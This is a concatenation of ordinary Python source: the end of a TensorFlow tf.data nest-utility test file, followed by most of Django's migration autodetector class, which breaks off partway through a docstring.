plain = {"d": 3, "b": 1, "a": 0, "c": 2}
ordered_flat = nest.flatten(ordered)
plain_flat = nest.flatten(plain)
self.assertEqual([0, 1, 2, 3], ordered_flat)
self.assertEqual([0, 1, 2, 3], plain_flat)
def testPackDictOrder(self):
"""Packing orders dicts by key, including OrderedDicts."""
ordered = collections.OrderedDict([("d", 0), ("b", 0), ("a", 0), ("c", 0)])
plain = {"d": 0, "b": 0, "a": 0, "c": 0}
seq = [0, 1, 2, 3]
ordered_reconstruction = nest.pack_sequence_as(ordered, seq)
plain_reconstruction = nest.pack_sequence_as(plain, seq)
self.assertEqual(
collections.OrderedDict([("d", 3), ("b", 1), ("a", 0), ("c", 2)]),
ordered_reconstruction)
self.assertEqual({"d": 3, "b": 1, "a": 0, "c": 2}, plain_reconstruction)
def testFlattenAndPackWithDicts(self):
# A nice messy mix of tuples, lists, dicts, and `OrderedDict`s.
named_tuple = collections.namedtuple("A", ("b", "c"))
mess = (
"z",
named_tuple(3, 4),
{
"c": (
1,
collections.OrderedDict([
("b", 3),
("a", 2),
]),
),
"b": 5
},
17
)
flattened = nest.flatten(mess)
self.assertEqual(flattened, ["z", 3, 4, 5, 1, 2, 3, 17])
structure_of_mess = (
14,
named_tuple("a", True),
{
"c": (
0,
collections.OrderedDict([
("b", 9),
("a", 8),
]),
),
"b": 3
},
"hi everybody",
)
unflattened = nest.pack_sequence_as(structure_of_mess, flattened)
self.assertEqual(unflattened, mess)
# Check also that the OrderedDict was created, with the correct key order.
unflattened_ordered_dict = unflattened[2]["c"][1]
self.assertIsInstance(unflattened_ordered_dict, collections.OrderedDict)
self.assertEqual(list(unflattened_ordered_dict.keys()), ["b", "a"])
def testFlattenSparseValue(self):
st = sparse_tensor.SparseTensorValue([[0]], [0], [1])
single_value = st
list_of_values = [st, st, st]
nest_of_values = ((st), ((st), (st)))
dict_of_values = {"foo": st, "bar": st, "baz": st}
self.assertEqual([st], nest.flatten(single_value))
self.assertEqual([[st, st, st]], nest.flatten(list_of_values))
self.assertEqual([st, st, st], nest.flatten(nest_of_values))
self.assertEqual([st, st, st], nest.flatten(dict_of_values))
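  # Note added for illustration: unlike the generic TensorFlow nest utility,
  # this tf.data variant treats plain Python lists as leaves; hence
  # flatten(list_of_values) above yields [[st, st, st]], and is_sequence()
  # below reports False for lists.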
def testIsSequence(self):
self.assertFalse(nest.is_sequence("1234"))
self.assertFalse(nest.is_sequence([1, 3, [4, 5]]))
self.assertTrue(nest.is_sequence(((7, 8), (5, 6))))
self.assertFalse(nest.is_sequence([]))
self.assertFalse(nest.is_sequence(set([1, 2])))
ones = array_ops.ones([2, 3])
self.assertFalse(nest.is_sequence(ones))
self.assertFalse(nest.is_sequence(math_ops.tanh(ones)))
self.assertFalse(nest.is_sequence(np.ones((4, 5))))
self.assertTrue(nest.is_sequence({"foo": 1, "bar": 2}))
self.assertFalse(
nest.is_sequence(sparse_tensor.SparseTensorValue([[0]], [0], [1])))
def testAssertSameStructure(self):
structure1 = (((1, 2), 3), 4, (5, 6))
structure2 = ((("foo1", "foo2"), "foo3"), "foo4", ("foo5", "foo6"))
structure_different_num_elements = ("spam", "eggs")
structure_different_nesting = (((1, 2), 3), 4, 5, (6,))
nest.assert_same_structure(structure1, structure2)
nest.assert_same_structure("abc", 1.0)
nest.assert_same_structure("abc", np.array([0, 1]))
nest.assert_same_structure("abc", constant_op.constant([0, 1]))
with self.assertRaisesRegexp(ValueError,
"don't have the same number of elements"):
nest.assert_same_structure(structure1, structure_different_num_elements)
with self.assertRaisesRegexp(ValueError,
"don't have the same number of elements"):
nest.assert_same_structure((0, 1), np.array([0, 1]))
with self.assertRaisesRegexp(ValueError,
"don't have the same number of elements"):
nest.assert_same_structure(0, (0, 1))
with self.assertRaisesRegexp(ValueError,
"don't have the same nested structure"):
nest.assert_same_structure(structure1, structure_different_nesting)
named_type_0 = collections.namedtuple("named_0", ("a", "b"))
named_type_1 = collections.namedtuple("named_1", ("a", "b"))
self.assertRaises(TypeError, nest.assert_same_structure, (0, 1),
named_type_0("a", "b"))
nest.assert_same_structure(named_type_0(3, 4), named_type_0("a", "b"))
self.assertRaises(TypeError, nest.assert_same_structure,
named_type_0(3, 4), named_type_1(3, 4))
with self.assertRaisesRegexp(ValueError,
"don't have the same nested structure"):
nest.assert_same_structure(named_type_0(3, 4), named_type_0((3,), 4))
with self.assertRaisesRegexp(ValueError,
"don't have the same nested structure"):
nest.assert_same_structure(((3,), 4), (3, (4,)))
structure1_list = {"a": ((1, 2), 3), "b": 4, "c": (5, 6)}
with self.assertRaisesRegexp(TypeError,
"don't have the same sequence type"):
nest.assert_same_structure(structure1, structure1_list)
nest.assert_same_structure(structure1, structure2, check_types=False)
nest.assert_same_structure(structure1, structure1_list, check_types=False)
def testMapStructure(self):
structure1 = (((1, 2), 3), 4, (5, 6))
structure2 = (((7, 8), 9), 10, (11, 12))
structure1_plus1 = nest.map_structure(lambda x: x + 1, structure1)
nest.assert_same_structure(structure1, structure1_plus1)
self.assertAllEqual(
[2, 3, 4, 5, 6, 7],
nest.flatten(structure1_plus1))
structure1_plus_structure2 = nest.map_structure(
lambda x, y: x + y, structure1, structure2)
self.assertEqual(
(((1 + 7, 2 + 8), 3 + 9), 4 + 10, (5 + 11, 6 + 12)),
structure1_plus_structure2)
self.assertEqual(3, nest.map_structure(lambda x: x - 1, 4))
self.assertEqual(7, nest.map_structure(lambda x, y: x + y, 3, 4))
with self.assertRaisesRegexp(TypeError, "callable"):
nest.map_structure("bad", structure1_plus1)
with self.assertRaisesRegexp(ValueError, "same nested structure"):
nest.map_structure(lambda x, y: None, 3, (3,))
with self.assertRaisesRegexp(TypeError, "same sequence type"):
nest.map_structure(lambda x, y: None, ((3, 4), 5), {"a": (3, 4), "b": 5})
with self.assertRaisesRegexp(ValueError, "same nested structure"):
nest.map_structure(lambda x, y: None, ((3, 4), 5), (3, (4, 5)))
with self.assertRaisesRegexp(ValueError, "same nested structure"):
nest.map_structure(lambda x, y: None, ((3, 4), 5), (3, (4, 5)),
check_types=False)
with self.assertRaisesRegexp(ValueError, "Only valid keyword argument"):
nest.map_structure(lambda x: None, structure1, foo="a")
with self.assertRaisesRegexp(ValueError, "Only valid keyword argument"):
nest.map_structure(lambda x: None, structure1, check_types=False, foo="a")
def testAssertShallowStructure(self):
inp_ab = ("a", "b")
inp_abc = ("a", "b", "c")
expected_message = (
"The two structures don't have the same sequence length. Input "
"structure has length 2, while shallow structure has length 3.")
with self.assertRaisesRegexp(ValueError, expected_message):
nest.assert_shallow_structure(inp_abc, inp_ab)
inp_ab1 = ((1, 1), (2, 2))
inp_ab2 = {"a": (1, 1), "b": (2, 2)}
expected_message = (
"The two structures don't have the same sequence type. Input structure "
"has type <(type|class) 'tuple'>, while shallow structure has type "
"<(type|class) 'dict'>.")
with self.assertRaisesRegexp(TypeError, expected_message):
nest.assert_shallow_structure(inp_ab2, inp_ab1)
nest.assert_shallow_structure(inp_ab2, inp_ab1, check_types=False)
inp_ab1 = {"a": (1, 1), "b": {"c": (2, 2)}}
inp_ab2 = {"a": (1, 1), "b": {"d": (2, 2)}}
expected_message = (
r"The two structures don't have the same keys. Input "
r"structure has keys \['c'\], while shallow structure has "
r"keys \['d'\].")
with self.assertRaisesRegexp(ValueError, expected_message):
nest.assert_shallow_structure(inp_ab2, inp_ab1)
inp_ab = collections.OrderedDict([("a", 1), ("b", (2, 3))])
inp_ba = collections.OrderedDict([("b", (2, 3)), ("a", 1)])
nest.assert_shallow_structure(inp_ab, inp_ba)
def testFlattenUpTo(self):
input_tree = (((2, 2), (3, 3)), ((4, 9), (5, 5)))
shallow_tree = ((True, True), (False, True))
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [(2, 2), (3, 3), (4, 9), (5, 5)])
self.assertEqual(flattened_shallow_tree, [True, True, False, True])
input_tree = ((("a", 1), (("b", 2), (("c", 3), (("d", 4))))))
shallow_tree = (("level_1", ("level_2", ("level_3", ("level_4")))))
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
input_tree_flattened = nest.flatten(input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree,
[("a", 1), ("b", 2), ("c", 3), ("d", 4)])
self.assertEqual(input_tree_flattened, ["a", 1, "b", 2, "c", 3, "d", 4])
## Shallow non-list edge-case.
# Using iterable elements.
input_tree = ["input_tree"]
shallow_tree = "shallow_tree"
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
input_tree = ("input_tree_0", "input_tree_1")
shallow_tree = "shallow_tree"
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
# Using non-iterable elements.
input_tree = (0,)
shallow_tree = 9
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
input_tree = (0, 1)
shallow_tree = 9
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
## Both non-list edge-case.
# Using iterable elements.
input_tree = "input_tree"
shallow_tree = "shallow_tree"
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
# Using non-iterable elements.
input_tree = 0
shallow_tree = 0
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
## Input non-list edge-case.
# Using iterable elements.
input_tree = "input_tree"
shallow_tree = ("shallow_tree",)
expected_message = ("If shallow structure is a sequence, input must also "
"be a sequence. Input has type: <(type|class) 'str'>.")
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, list(shallow_tree))
input_tree = "input_tree"
shallow_tree = ("shallow_tree_9", "shallow_tree_8")
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, list(shallow_tree))
# Using non-iterable elements.
input_tree = 0
shallow_tree = (9,)
expected_message = ("If shallow structure is a sequence, input must also "
"be a sequence. Input has type: <(type|class) 'int'>.")
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, list(shallow_tree))
input_tree = 0
shallow_tree = (9, 8)
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, list(shallow_tree))
# Using dict.
input_tree = {"a": ((2, 2), (3, 3)), "b": ((4, 9), (5, 5))}
shallow_tree = {"a": (True, True), "b": (False, True)}
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [(2, 2), (3, 3), (4, 9), (5, 5)])
self.assertEqual(flattened_shallow_tree, [True, True, False, True])
def testMapStructureUpTo(self):
ab_tuple = collections.namedtuple("ab_tuple", "a, b")
op_tuple = collections.namedtuple("op_tuple", "add, mul")
inp_val = ab_tuple(a=2, b=3)
inp_ops = ab_tuple(a=op_tuple(add=1, mul=2), b=op_tuple(add=2, mul=3))
out = nest.map_structure_up_to(
inp_val, lambda val, ops: (val + ops.add) * ops.mul, inp_val, inp_ops)
self.assertEqual(out.a, 6)
self.assertEqual(out.b, 15)
data_list = ((2, 4, 6, 8), ((1, 3, 5, 7, 9), (3, 5, 7)))
name_list = ("evens", ("odds", "primes"))
out = nest.map_structure_up_to(
name_list, lambda name, sec: "first_{}_{}".format(len(sec), name),
name_list, data_list)
self.assertEqual(out, ("first_4_evens", ("first_5_odds", "first_3_primes")))
if __name__ == "__main__":
test.main()
from __future__ import unicode_literals
import datetime
import re
from itertools import chain
from django.conf import settings
from django.db import models
from django.db.migrations import operations
from django.db.migrations.migration import Migration
from django.db.migrations.operations.models import AlterModelOptions
from django.db.migrations.optimizer import MigrationOptimizer
from django.db.migrations.questioner import MigrationQuestioner
from django.utils import six
from .topological_sort import stable_topological_sort
class MigrationAutodetector(object):
"""
Takes a pair of ProjectStates, and compares them to see what the
first would need doing to make it match the second (the second
usually being the project's current state).
Note that this naturally operates on entire projects at a time,
as it's likely that changes interact (for example, you can't
add a ForeignKey without having a migration to add the table it
depends on first). A user interface may offer single-app usage
if it wishes, with the caveat that it may not always be possible.
"""
def __init__(self, from_state, to_state, questioner=None):
self.from_state = from_state
self.to_state = to_state
self.questioner = questioner or MigrationQuestioner()
self.existing_apps = {app for app, model in from_state.models}
def changes(self, graph, trim_to_apps=None, convert_apps=None, migration_name=None):
"""
        Main entry point to produce a list of applicable changes.
Takes a graph to base names on and an optional set of apps
to try and restrict to (restriction is not guaranteed)
"""
changes = self._detect_changes(convert_apps, graph)
changes = self.arrange_for_graph(changes, graph, migration_name)
if trim_to_apps:
changes = self._trim_to_apps(changes, trim_to_apps)
return changes
def deep_deconstruct(self, obj):
"""
Recursive deconstruction for a field and its arguments.
Used for full comparison for rename/alter; sometimes a single-level
deconstruction will not compare correctly.
"""
if isinstance(obj, list):
return [self.deep_deconstruct(value) for value in obj]
elif isinstance(obj, tuple):
return tuple(self.deep_deconstruct(value) for value in obj)
elif isinstance(obj, dict):
return {
key: self.deep_deconstruct(value)
for key, value in obj.items()
}
elif isinstance(obj, type):
# If this is a type that implements 'deconstruct' as an instance method,
# avoid treating this as being deconstructible itself - see #22951
return obj
elif hasattr(obj, 'deconstruct'):
deconstructed = obj.deconstruct()
if isinstance(obj, models.Field):
# we have a field which also returns a name
deconstructed = deconstructed[1:]
path, args, kwargs = deconstructed
return (
path,
[self.deep_deconstruct(value) for value in args],
{
key: self.deep_deconstruct(value)
for key, value in kwargs.items()
},
)
else:
return obj
def only_relation_agnostic_fields(self, fields):
"""
Return a definition of the fields that ignores field names and
what related fields actually relate to.
Used for detecting renames (as, of course, the related fields
        change during renames).
"""
fields_def = []
for name, field in sorted(fields):
deconstruction = self.deep_deconstruct(field)
if field.remote_field and field.remote_field.model:
del deconstruction[2]['to']
fields_def.append(deconstruction)
return fields_def
def _detect_changes(self, convert_apps=None, graph=None):
"""
Returns a dict of migration plans which will achieve the
change from from_state to to_state. The dict has app labels
as keys and a list of migrations as values.
The resulting migrations aren't specially named, but the names
do matter for dependencies inside the set.
convert_apps is the list of apps to convert to use migrations
(i.e. to make initial migrations for, in the usual case)
graph is an optional argument that, if provided, can help improve
dependency generation and avoid potential circular dependencies.
"""
# The first phase is generating all the operations for each app
# and gathering them into a big per-app list.
# We'll then go through that list later and order it and split
# into migrations to resolve dependencies caused by M2Ms and FKs.
self.generated_operations = {}
# Prepare some old/new state and model lists, separating
# proxy models and ignoring unmigrated apps.
self.old_apps = self.from_state.concrete_apps
self.new_apps = self.to_state.apps
self.old_model_keys = []
self.old_proxy_keys = []
self.old_unmanaged_keys = []
self.new_model_keys = []
self.new_proxy_keys = []
self.new_unmanaged_keys = []
for al, mn in sorted(self.from_state.models.keys()):
model = self.old_apps.get_model(al, mn)
if not model._meta.managed:
self.old_unmanaged_keys.append((al, mn))
elif al not in self.from_state.real_apps:
if model._meta.proxy and not model._meta.local_fields:
self.old_proxy_keys.append((al, mn))
else:
self.old_model_keys.append((al, mn))
for al, mn in sorted(self.to_state.models.keys()):
model = self.new_apps.get_model(al, mn)
if not model._meta.managed:
self.new_unmanaged_keys.append((al, mn))
elif (
al not in self.from_state.real_apps or
(convert_apps and al in convert_apps)
):
if model._meta.proxy and not model._meta.local_fields:
self.new_proxy_keys.append((al, mn))
else:
self.new_model_keys.append((al, mn))
# Renames have to come first
self.generate_renamed_models()
# Prepare lists of fields and generate through model map
self._prepare_field_lists()
self._generate_through_model_map()
# Generate non-rename model operations
self.generate_deleted_models()
self.generate_created_models()
self.generate_deleted_proxies()
self.generate_created_proxies()
self.generate_altered_options()
self.generate_altered_managers()
# Generate field operations
self.generate_renamed_fields()
self.generate_removed_fields()
self.generate_added_fields()
self.generate_altered_fields()
self.generate_altered_unique_together()
self.generate_altered_index_together()
self.generate_altered_db_table()
self.generate_altered_order_with_respect_to()
self._sort_migrations()
self._build_migration_list(graph)
self._optimize_migrations()
return self.migrations
def _prepare_field_lists(self):
"""
Prepare field lists, and prepare a list of the fields that used
through models in the old state so we can make dependencies
from the through model deletion to the field that uses it.
"""
self.kept_model_keys = set(self.old_model_keys).intersection(self.new_model_keys)
self.kept_proxy_keys = set(self.old_proxy_keys).intersection(self.new_proxy_keys)
self.kept_unmanaged_keys = set(self.old_unmanaged_keys).intersection(self.new_unmanaged_keys)
self.through_users = {}
self.old_field_keys = set()
self.new_field_keys = set()
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
self.old_field_keys.update((app_label, model_name, x) for x, y in old_model_state.fields)
self.new_field_keys.update((app_label, model_name, x) for x, y in new_model_state.fields)
def _generate_through_model_map(self):
"""
        Generate a map from each explicit through model to the
        (app_label, model_name, field_name) of the M2M field that uses it.
"""
for app_label, model_name in sorted(self.old_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
for field_name, field in old_model_state.fields:
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(field_name)
if (hasattr(old_field, "remote_field") and getattr(old_field.remote_field, "through", None)
and not old_field.remote_field.through._meta.auto_created):
through_key = (
old_field.remote_field.through._meta.app_label,
old_field.remote_field.through._meta.model_name,
)
self.through_users[through_key] = (app_label, old_model_name, field_name)
def _build_migration_list(self, graph=None):
"""
We need to chop the lists of operations up into migrations with
dependencies on each other. We do this by stepping up an app's list of
operations until we find one that has an outgoing dependency that isn't
in another app's migration yet (hasn't been chopped off its list). We
then chop off the operations before it into a migration and move onto
the next app. If we loop back around without doing anything, there's a
circular dependency (which _should_ be impossible as the operations are
all split at this point so they can't depend and be depended on).
"""
self.migrations = {}
num_ops = sum(len(x) for x in self.generated_operations.values())
chop_mode = False
while num_ops:
# On every iteration, we step through all the apps and see if there
# is a completed set of operations.
# If we find that a subset of the operations are complete we can
# try to chop it off from the rest and continue, but we only
# do this if we've already been through the list once before
# without any chopping and nothing has changed.
for app_label in sorted(self.generated_operations.keys()):
chopped = []
dependencies = set()
for operation in list(self.generated_operations[app_label]):
deps_satisfied = True
operation_dependencies = set()
for dep in operation._auto_deps:
is_swappable_dep = False
if dep[0] == "__setting__":
# We need to temporarily resolve the swappable dependency to prevent
# circular references. While keeping the dependency checks on the
# resolved model we still add the swappable dependencies.
# See #23322
resolved_app_label, resolved_object_name = getattr(settings, dep[1]).split('.')
original_dep = dep
dep = (resolved_app_label, resolved_object_name.lower(), dep[2], dep[3])
is_swappable_dep = True
if dep[0] != app_label and dep[0] != "__setting__":
# External app dependency. See if it's not yet
# satisfied.
for other_operation in self.generated_operations.get(dep[0], []):
if self.check_dependency(other_operation, dep):
deps_satisfied = False
break
if not deps_satisfied:
break
else:
if is_swappable_dep:
operation_dependencies.add((original_dep[0], original_dep[1]))
elif dep[0] in self.migrations:
operation_dependencies.add((dep[0], self.migrations[dep[0]][-1].name))
else:
# If we can't find the other app, we add a first/last dependency,
# but only if we've already been through once and checked everything
if chop_mode:
# If the app already exists, we add a dependency on the last migration,
# as we don't know which migration contains the target field.
# If it's not yet migrated or has no migrations, we use __first__
if graph and graph.leaf_nodes(dep[0]):
operation_dependencies.add(graph.leaf_nodes(dep[0])[0])
else:
operation_dependencies.add((dep[0], "__first__"))
else:
deps_satisfied = False
if deps_satisfied:
chopped.append(operation)
dependencies.update(operation_dependencies)
self.generated_operations[app_label] = self.generated_operations[app_label][1:]
else:
break
# Make a migration! Well, only if there's stuff to put in it
if dependencies or chopped:
if not self.generated_operations[app_label] or chop_mode:
subclass = type(str("Migration"), (Migration,), {"operations": [], "dependencies": []})
instance = subclass("auto_%i" % (len(self.migrations.get(app_label, [])) + 1), app_label)
instance.dependencies = list(dependencies)
instance.operations = chopped
instance.initial = app_label not in self.existing_apps
self.migrations.setdefault(app_label, []).append(instance)
chop_mode = False
else:
self.generated_operations[app_label] = chopped + self.generated_operations[app_label]
new_num_ops = sum(len(x) for x in self.generated_operations.values())
if new_num_ops == num_ops:
if not chop_mode:
chop_mode = True
else:
raise ValueError("Cannot resolve operation dependencies: %r" % self.generated_operations)
num_ops = new_num_ops
def _sort_migrations(self):
"""
Reorder to make things possible. The order we have already isn't bad,
but we need to pull a few things around so FKs work nicely inside the
same app
"""
for app_label, ops in sorted(self.generated_operations.items()):
# construct a dependency graph for intra-app dependencies
dependency_graph = {op: set() for op in ops}
for op in ops:
for dep in op._auto_deps:
if dep[0] == app_label:
for op2 in ops:
if self.check_dependency(op2, dep):
dependency_graph[op].add(op2)
# we use a stable sort for deterministic tests & general behavior
self.generated_operations[app_label] = stable_topological_sort(ops, dependency_graph)
def _optimize_migrations(self):
# Add in internal dependencies among the migrations
for app_label, migrations in self.migrations.items():
for m1, m2 in zip(migrations, migrations[1:]):
m2.dependencies.append((app_label, m1.name))
# De-dupe dependencies
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.dependencies = list(set(migration.dependencies))
# Optimize migrations
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.operations = MigrationOptimizer().optimize(migration.operations, app_label=app_label)
def check_dependency(self, operation, dependency):
"""
Returns ``True`` if the given operation depends on the given dependency,
``False`` otherwise.
"""
# Created model
if dependency[2] is None and dependency[3] is True:
return (
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower()
)
# Created field
elif dependency[2] is not None and dependency[3] is True:
return (
(
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower() and
any(dependency[2] == x for x, y in operation.fields)
) or
(
isinstance(operation, operations.AddField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
)
# Removed field
elif dependency[2] is not None and dependency[3] is False:
return (
isinstance(operation, operations.RemoveField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# Removed model
elif dependency[2] is None and dependency[3] is False:
return (
isinstance(operation, operations.DeleteModel) and
operation.name_lower == dependency[1].lower()
)
# Field being altered
elif dependency[2] is not None and dependency[3] == "alter":
return (
isinstance(operation, operations.AlterField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# order_with_respect_to being unset for a field
elif dependency[2] is not None and dependency[3] == "order_wrt_unset":
return (
isinstance(operation, operations.AlterOrderWithRespectTo) and
operation.name_lower == dependency[1].lower() and
(operation.order_with_respect_to or "").lower() != dependency[2].lower()
)
# Field is removed and part of an index/unique_together
elif dependency[2] is not None and dependency[3] == "foo_together_change":
return (
isinstance(operation, (operations.AlterUniqueTogether,
operations.AlterIndexTogether)) and
operation.name_lower == dependency[1].lower()
)
# Unknown dependency. Raise an error.
else:
raise ValueError("Can't handle dependency %r" % (dependency, ))
def add_operation(self, app_label, operation, dependencies=None, beginning=False):
# Dependencies are (app_label, model_name, field_name, create/delete as True/False)
operation._auto_deps = dependencies or []
if beginning:
self.generated_operations.setdefault(app_label, []).insert(0, operation)
else:
self.generated_operations.setdefault(app_label, []).append(operation)
def swappable_first_key(self, item):
"""
Sorting key function that places potential swappable models first in
lists of created models (only real way to solve #22783)
"""
try:
model = self.new_apps.get_model(item[0], item[1])
base_names = [base.__name__ for base in model.__bases__]
string_version = "%s.%s" % (item[0], item[1])
if (
model._meta.swappable or
"AbstractUser" in base_names or
"AbstractBaseUser" in base_names or
settings.AUTH_USER_MODEL.lower() == string_version.lower()
):
return ("___" + item[0], "___" + item[1])
except LookupError:
pass
return item
def generate_renamed_models(self):
"""
        Finds any renamed models, generates the operations for them, and
        removes the old entries from the model lists.
Must be run before other model-level generation.
"""
self.renamed_models = {}
self.renamed_models_rel = {}
added_models = set(self.new_model_keys) - set(self.old_model_keys)
for app_label, model_name in sorted(added_models):
model_state = self.to_state.models[app_label, model_name]
model_fields_def = self.only_relation_agnostic_fields(model_state.fields)
removed_models = set(self.old_model_keys) - set(self.new_model_keys)
for rem_app_label, rem_model_name in removed_models:
if rem_app_label == app_label:
rem_model_state = self.from_state.models[rem_app_label, rem_model_name]
rem_model_fields_def = self.only_relation_agnostic_fields(rem_model_state.fields)
if model_fields_def == rem_model_fields_def:
if self.questioner.ask_rename_model(rem_model_state, model_state):
self.add_operation(
app_label,
operations.RenameModel(
old_name=rem_model_state.name,
new_name=model_state.name,
)
)
self.renamed_models[app_label, model_name] = rem_model_name
self.renamed_models_rel['%s.%s' % (rem_model_state.app_label, rem_model_state.name)] = '%s.%s' % (model_state.app_label, model_state.name)
self.old_model_keys.remove((rem_app_label, rem_model_name))
self.old_model_keys.append((app_label, model_name))
break
def generate_created_models(self):
"""
Find all new models (both managed and unmanaged) and make create
operations for them as well as separate operations to create any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also defer any model options that refer to collections of fields
that might be deferred (e.g. unique_together, index_together).
"""
old_keys = set(self.old_model_keys).union(self.old_unmanaged_keys)
added_models = set(self.new_model_keys) - old_keys
added_unmanaged_models = set(self.new_unmanaged_keys) - old_keys
all_added_models = chain(
sorted(added_models, key=self.swappable_first_key, reverse=True),
sorted(added_unmanaged_models, key=self.swappable_first_key, reverse=True)
)
for app_label, model_name in all_added_models:
model_state = self.to_state.models[app_label, model_name]
model_opts = self.new_apps.get_model(app_label, model_name)._meta
# Gather related fields
related_fields = {}
primary_key_rel = None
for field in model_opts.local_fields:
if field.remote_field:
if field.remote_field.model:
if field.primary_key:
primary_key_rel = field.remote_field.model
elif not field.remote_field.parent_link:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
related_fields[field.name] = field
for field in model_opts.local_many_to_many:
if field.remote_field.model:
related_fields[field.name] = field
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
related_fields[field.name] = field
# Are there unique/index_together to defer?
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
order_with_respect_to = model_state.options.pop('order_with_respect_to', None)
# Depend on the deletion of any possible proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Depend on the other end of the primary key if it's a relation
if primary_key_rel:
dependencies.append((
primary_key_rel._meta.app_label,
primary_key_rel._meta.object_name,
None,
True
))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[d for d in model_state.fields if d[0] not in related_fields],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
dependencies=dependencies,
beginning=True,
)
# Don't add operations which modify the database for unmanaged models
if not model_opts.managed:
continue
# Generate operations for each related field
for name, field in sorted(related_fields.items()):
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.remote_field.model._meta.app_label
dep_object_name = field.remote_field.model._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
dependencies.append((
field.remote_field.through._meta.app_label,
field.remote_field.through._meta.object_name,
None,
True
))
# Depend on our own model being created
dependencies.append((app_label, model_name, None, True))
# Make operation
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=name,
field=field,
),
dependencies=list(set(dependencies)),
)
            # Generate other operations
related_dependencies = [
(app_label, model_name, name, True)
for name, field in sorted(related_fields.items())
]
related_dependencies.append((app_label, model_name, None, True))
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=unique_together,
),
dependencies=related_dependencies
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=index_together,
),
dependencies=related_dependencies
)
if order_with_respect_to:
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=order_with_respect_to,
),
dependencies=[
(app_label, model_name, order_with_respect_to, True),
(app_label, model_name, None, True),
]
)
def generate_created_proxies(self):
"""
Makes CreateModel statements for proxy models.
        We use the same statement type to cut down on code duplication, but
